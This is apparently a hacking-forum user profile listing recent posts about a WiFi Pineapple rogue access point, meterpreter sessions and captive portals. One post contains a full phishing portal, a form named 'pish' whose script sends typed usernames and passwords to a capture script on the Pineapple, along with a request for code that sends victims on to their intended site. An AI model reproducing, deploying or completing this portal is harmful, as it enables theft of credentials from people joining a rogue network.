Jump to content

d0n350n

Active Members
  • Posts

    12
  • Joined

  • Last visited

Recent Profile Visitors

829 profile views

d0n350n's Achievements

  1. Thanks Bro!! I figured it out, sorta, lol, but let me ask you this? I can get a meterpreter session, but none of the commands work, not even help or shell?
  2. I have a question... Does your kali system have to be connected to the pineapple? Reason I ask is because, correct me if i'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the kali machine is on a 10. network. Does the pineapple send the shell or receive the shell?
  3. Thanks Again, It worked!!! But you kinda lost me with the code removal...
  4. Help!!! I need the code for the authtarget so that the client goes to the site they actually wanted. Any takers? <html><CENTER> <head> <title>$gatewayname Entry</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i></i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value) var passwordvalue=encodeURIComponent(document.getElementById("password").value) var parameters="username="+usernamevalue+"&password="+passwordvalue xmlhttp.open("POST", "http://172.16.42.1/capture2.php", true) xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded") xmlhttp.send(parameters) } </script> </head> <body bgcolor="white"> <div id="results"><p><i></i></p></div> <table style="background-image:url(http://172.16.42.1/multi_logs_2.png);background-repeat:no-repeat;background-position:center center;border:0px solid black;width:800px;height:600px;"> <TR> <TD width="42%" height="10%"></td> <TD width="58%" height="10%"></td> </tr> <tr> <TD width="42%" height="90%"></td> <TD width="58%" height="90%"> <form id="pish" method="POST" action="http://172.16.42.1/capture2.php"> <b>Email or Username:</b><BR><input type="text" name="username" id="username"><br /> <b>Password:</b><BR><input type="password" name="password" id="password"><br /> <br> <button type="button" onclick="sendInfo();return false;">Submit Info</button> </form> </TD></TR></TABLE> </body> </html>
  5. I could be that your saved portal is saved to your sdcard. If thats the case, you need to navigate to /sd/portals on your pineapple, copy and resave to the internal storage and delete the old one from there while your at it. Hope this helped... #learnedthehardway or update to version 2.3
  6. Maybe this is a n00b mistake as well, lol, but when you say disable wlan2, i'm confused because I have wlan0 and wlan1?
×
×
  • Create New...